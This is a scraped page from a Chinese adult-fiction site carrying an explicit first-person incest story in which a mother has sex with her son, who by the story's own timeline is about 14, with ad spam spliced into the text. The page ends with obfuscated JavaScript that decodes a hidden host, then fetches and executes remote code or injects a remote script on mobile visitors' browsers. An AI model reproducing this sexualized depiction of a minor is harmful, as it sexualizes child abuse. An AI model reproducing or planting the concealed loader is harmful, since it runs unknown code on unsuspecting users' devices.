返回

【母子乾坤,蚊帐云雨】【完】718

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

我今年19岁,是大一学生,现就读于北京某大学。表面上我是一个很乖的孩子,得到老师的宠爱和同学的羡慕,可实际上我却没有他们认为的那样好,其中一点就可以证明,我做为一个刚满19的学生竟然有5年的性生活史。

  记得那年是初一刚结束放暑假的时候,我父亲在外工作已有2年了,每年只有节假日才回家。爷爷奶奶在我很小的时候就已经去世了,因此那个暑假家里就只有我和妈妈。我妈妈在我家附近的一家服装厂工作,老板剥削的厉害,一天基本上要做12小时才能回家,那时都已经是晚上22点了。那几年我们那里的治安不太好,可能是来打工的外地人特别多吧,晚上抢劫、入室偷窃的事很多。妈妈不敢一个人回家,每天都叫我去接她,由于爸爸不在,所以晚上也叫我陪她睡,所以在我们身上就发生了母子乱伦的事情。

  那是我陪她睡的面刷新下哦” 只要您少抽一包烟就可以享受到不一样的视觉冲激已经使我完全把她当成了女人,下体不能控制的膨大了:“嗯。”妈妈已经觉察到了这个变化,脸上泛起了红晕:“明天到医院去看看。”看到妈妈的这个变化我脑子已经充血了,妈妈也已经把我当成是男人了,不然她的脸也不会红了。怎么办?我很想马上冲上去和她性交,我太渴望这个了,人总是对神秘而又未发生的事感兴趣。我很想知道性交是什么滋味。但是我还是不敢这么做,我只能是脑子里想想,因为我是个乖孩子,道德规范着我。

  电视结束了,夜已深,我静静的躺着,怎么也睡不着,脑子里尽是妈妈的阴毛、胸脯、发红的小脸。我不顾一切的幻想和妈妈做爱,把任何道德都抛在了脑外。不知不觉已经过了一个多小时了,我转过身去,看到妈妈正背向我侧躺着,不知道有没有睡着。我轻轻的叫到:“妈妈,妈妈——”没有任何反应。不知为什么我有一种冲动,我侧躺过去,脸紧贴着妈妈的头发,闻着她的体香,我的阴茎更加的涨大,欲望也更强烈,我把自己的内裤脱了,鸡巴早已贴上小腹了,然后扶住它对准妈妈的股沟轻轻的撞击,我也不知道自己怎么会有这么大的胆子干这种事情,但是我确实在做了。

  和妈妈的肉体就只有一块布的间隔,体验着那种手淫未曾有过的感觉。没顶几下我发现妈妈好像在装睡,因为她的呼吸越来越急促了。我吓了一跳,顶住妈妈的股沟不敢再动了。被妈妈发现了该怎么办啊,刚刚我没有考虑到这一点,现在有些后悔了,真不该这么做。正当我想撤出的时候,妈妈突然间转过身来,奇怪的看着我,然后一把抓住了我的阴茎,我还没反应过来,妈妈就已经脱掉了自己的内裤骑跨在我的身上了,然后来回的在我腰上压着我的阴茎摩擦。

  我兴奋极了,有生以来第一次看到女人的下体,尽管不是很清楚,但是毕竟还是看到了。我期盼已久的性交就要发生了,这是多么美妙的感觉啊。渐渐的我发现妈妈摩擦后好象下体产生了粘乎乎的液体,弄的我小腹上怪难受的。突然她停住了,握住我的鸡巴,把包皮向下翻露出了龟头,然后她半蹲着,用龟头在她的湿润的小阴唇之间来回的摩擦,我觉得龟头麻麻的,全身像触电一样,精液射了出来,全身感到无比的轻松。我还没有插入就已经射了,一种悔意涌上心头,我错过了一次体验性交的机会,真是太没用了,我真想哭。妈妈叹了口气,进卫生间了。我知道她也在怪我,我后悔经常手淫,害的关键时刻射掉了。妈妈从卫生间里出来了,看见我这么沮丧,说:“别多想了,第一次是这样的。”随后我们各自睡了。

  那天我醒得很早,大约5点左右吧,不过是夏天,天已经有点亮了。我看看妈妈还没有醒背着我侧躺着,昨天那么好的机会都已经错过了,今天晚上妈妈还会不会让我在再这样做。想到有可能再也没有机会了,我就不管什么了,轻轻的去拉妈妈的内裤,比较松很容易就把她的屁股露了出来,从后面可以看到她的阴毛,大小阴唇,粉红色的肛门。我的阴茎早已勃起,但是我不知道阴茎该从哪里插入,不管了就对着夹缝插,可能是妈妈夹的比较紧,怎么也插不进去,就在外面乱撞,这时候妈妈又醒了。她一下子就把内裤穿好了,转过身来怒说:“别胡闹了,我们是母子,不能再这么做了。”

  难道昨天是胡闹吗?我心想,肯定是我昨天晚上的表现太差了,她才不愿意再来一次。“妈妈,求你了,再给我一次机会吧?”我哀求道。

  “别,今天还要上班了,你刚刚吵醒我了,以后再说吧。”妈妈语气稍微平和了点。

  我已经是狗急跳墙了,一把抱住妈妈,哭着哀求:“妈妈,再来一次。求你了,很快的。”我不住的开始吻妈妈的脸,阴茎胡乱的撞着她的小腹。

  可能是对儿子的溺爱吧,妈妈竟然答应了,如果昨天她是性冲动的话,今天做这绝对是一种母爱。温柔的说道:“宝贝,别急,慢慢来。”是的,我还没有脱掉她的内裤。于是我就拉掉了它,然后把鸡巴对着她下面乱撞。还是不行,都快5分钟了。我急了,也哭了,怎么这么难插啊!妈妈也看不过去了说:“先把屁股抬起。”我照着做了,然后妈妈握着我的阴茎,引入了她的阴道口,“向下顶。”我顶了下去,龟头被夹住了,里面热乎乎的,我的阴茎被夹得很紧,再用力一顶,好象松了很多,鸡巴也全部没入了进去,那种感觉太妙了!

  有了上次的经验,我就小心了很多,慢慢的体会,万一什么时候要射了,也好及时的停住。我伏卧在妈妈的两腿之间慢慢的做着活塞似的运动,大约抽插了七八十下吧,感觉要射了。于是我就停了会儿,等这种射意没了,再开始抽插。渐渐的觉得妈妈的阴道越插越松,越插越滑,我也越来越没有射意了。开始加快了抽插的速度、力度,妈妈也开始迎合着我抬高她的屁股,并开始发出“嗯,啊”等呻吟声,大约过了二十来分钟吧,我又开始有射精的感觉了,于是我放慢了速度,“别,宝贝,快,用力啊,我快不行了。”妈妈哀求到。我也想马上射,所以加快抽插速度与力度,我们同时嚎叫:“啊,啊,啊,啊,啊,————”

  一股电流冲了上来,精液喷了出来,射在了妈妈的阴道里。全身像跨了一样,无比的轻松。不一会儿,我发现妈妈全身开始在发抖,阴道在收缩,我想她也应该达到高潮了。我伏在妈妈的身上,像刚跑完一千米似的喘着粗气。妈妈闭着眼睛,也一样喘着粗气。

  “宝贝,妈妈一点力气都没了,今天叫我怎么去上班啊。”她开着玩笑道,“快下来。”

  我翻下身来,自豪的说:“我还行吧。”

  妈妈笑到:“行什么啊,还不是没插入就射的没用鬼。”

  “真的吗?”我假装爬上去再来一次。

  “别别,妈妈求饶还不行吗?”她急着说,“我一点力气都没了,再来我会死掉的。”

  就这样我的第一次性经验完成了,还算是比较满意。

  后来的这几年里我们经常的做爱,花样越来越多,卧室、卫生间、厨房、客厅、田野里、树林里、河里、甚至在深夜的马路上,感觉越来越刺激了,不过随着我慢慢的长大,罪恶感也越来越浓了。但是我们还是不能自拔,现在我远走他乡去求学,而家里经过爸爸的奋斗,条件也越来越好,妈妈再也不用出去辛苦的工作了。因此,现在每个月她都来我的学校两三次,每次都住上几天,我们自然也免不了再温存一番。但是我们还是非常怀念过去那段日子的。

  ???? 【完】

  ???????? ?字节数:6838

评分
相关推荐
3.0分

3.0分 母子乾坤,蚊帐云雨ffd

3.0分

3.0分 母子蚊帐情4ba

3.0分

3.0分 母子蚊帐情4ba

3.0分

3.0分 母子蚊帐情-淫妻奸情5ba

3.0分

3.0分 母子蚊帐情-乱伦小说2a9

3.0分

3.0分 乾坤大挪移作者不详完e98

3.0分

3.0分 乾坤大挪移351

3.0分

3.0分 乾坤大挪移351

3.0分

3.0分 武动乾坤_ 绫 清 竹148

3.0分

3.0分 【云雨春情】【完】79a

3.0分

3.0分 巫山云雨完5ec

3.0分

3.0分 武动乾坤改编之凌清竹a7a

3.0分

3.0分 《武动乾坤改编》之凌清竹560

3.0分

3.0分 [武动乾坤之淫魔乱舞] 1377

3.0分

3.0分 [武动乾坤之淫魔乱舞] 2205

3.0分

3.0分 [武动乾坤之淫魔乱舞] 38c4


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};